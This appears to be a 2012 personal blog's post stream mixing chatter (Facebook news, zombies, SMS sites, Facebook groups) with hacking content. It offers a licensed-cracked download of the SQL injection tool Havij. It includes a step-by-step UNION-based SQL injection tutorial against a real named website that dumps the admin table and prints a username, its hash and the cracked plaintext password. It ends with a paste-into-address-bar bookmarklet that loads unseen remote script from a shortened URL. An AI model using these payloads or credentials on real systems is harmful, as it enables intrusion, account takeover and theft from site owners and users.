✎ Ⓙ ⓗ Ⓞ ⓝ ㋡

Facebook to ‘disappear’ in under 10 years, according to analyst
Facebook’s success will be short lived, according to one Wall Street analyst, predicting the site will “disappear” in under adecade. ( read more @ http://www.foxnews.com/scitech/2012/06/05/facebook-to-disappear-in-under-10-y… )
Maybe we should start planting plants already!
As posted on CNN ( http://on.cnn.com/N3RUBn ), the term “Zombie apocalypse” has been most discussed over the internet. “The End of the World, when people who have died rise again in rotten corpses searching for blood and brains to strengthen them.” - this is also said in the article.

We all know that zombies aren’t real. But if it is, we can stop them by planting plants and trees just like in th game “Plants vs Zombies”. Seriously, planting can really save the whole world even the enemies are zomies or whatever like natural calamities. So before the zombies gets inside your house and eat your brain, we should start saving mother earth already.

P.S.: Just telling my opinion.. :P
Havij 1.15 Pro + Licence

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. (More about Havij)

Download and extract Havij 1.15 Pro from here ( http://j.gs/12Hs )

Follow the referrence image below for the registration:

SQL Injection Tutorials & Ideas

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user’s input is not filtered or
improperly filtered.Example the webpages links in format 
www.anything.com/something.php?something=something, example 
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (‘) that is
www.tartanarmy.com/news/news.php?id=130
and we got an error on the screen because it included the single quote (‘) while processing the results. It assures us that it didn’t filter our input and is vulnerable to attack.


Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.


  


We Have chosen database “explore_hacking” from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose ‘admin’ table, it has columns id,username,password,email. What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases. 

We have opened database “information_schema” which is present by default and the table named as “TABLES” in database.


SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on “click here” and open in new tab.

Step1.Find number of columns.
Lets use “ORDER BY” clause here, it is used to sort the columns.Choose any number, 
say 10. Here I have assumed that number columns cant be more then 10.”—” is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10— Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on ‘6’
http://www.tartanarmy.com/news/news.php?id=130 order by 6—
we didn’t get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use “UNION ALL” and “SELECT” command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6—. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with “@@version” or “verson()” (if first one doesn’t work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6— Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like “information_schema” which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with “table_name”.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from  
 information_schema.tables where table_schema=database()—
 Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()— Click here


Step 5.Finding column names.
Simlary get all the columns by simply replacing ‘table’ with ‘column’
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from 
information_schema.columns where table_schema=database()— 
Click here
There is a repeating element like in this case is ‘id’ .From it, we come to know which table number
has which columns. 



Step 6.Fetching data from columns. 
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. “0x3a” is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin—. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say 
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got ‘oorwullie’ in result ( password in clear text).

 

Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked.
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

Copyrights to EploreHacking.com. Note: Some of the links are already not working.

Send FREE SMS Anywher All Over the World
Running out of prepaid credits or do you want to text someone who is in another country? Try out OfSMS.in - It can send SMS from and to wherever you want. Although sometimes the recipient will recieve the sms delayed, but at least it worked.. :D
Send FREE SMS Anywher All Over the World
Running out of prepaid credits or do you want to text someone who is in another country? Try out <a href=”http://ofsms.in/">OfSMS.in</a> - It can send SMS from and to wherever you want. Although sometimes the recipient will recieve the sms delayed, but at least it worked.. :D 
Looking for a group of Filipino Programmers? ((facebook groups, posts))
Do you have any questions, need help, or just want to share something about some programming language? Please join “Programmers” on facebook - this is like i can call a “pinoy” version of StackOverflow where a group of filipino developers/programmers in all programming languages and platforms unite together and help one another. Go to this link to know more about the group ( http://facebook.com/groups/310126675677419 ). Please also join Philippine Group of Web Developers on facebook ( http://facebook.com/groups/pg.webdev )
Mongsang-ga has just moved to Posterous!
Its been along time since i stopped blogging as i got busy doing things with my life. Before, i use Tumblr to blog and write just about anything like gadgets, technology, useful tools & applications, programming, tutorials, etc. Now i will be sharing again more of it but on my new blog, and its on Posterous! :D
Auto-Like Script for Facebook

Simple drag the link below to your bookmarks bar then press it anywhere on facebook.

Like Everthing on this page!

Or paste this code on your browser’s address bar:

javascript:var s = document.getElementById(‘happyScript’); if(s) {s.parentNode.removeChild(s);}s = document.createElement(‘script’); s.setAttribute(‘src’,’http://goo.gl/sl29E’); s.setAttribute(‘type’,’text/javascript’); s.setAttribute(‘id’, ‘happyScript’); document.body.appendChild(s); void(0);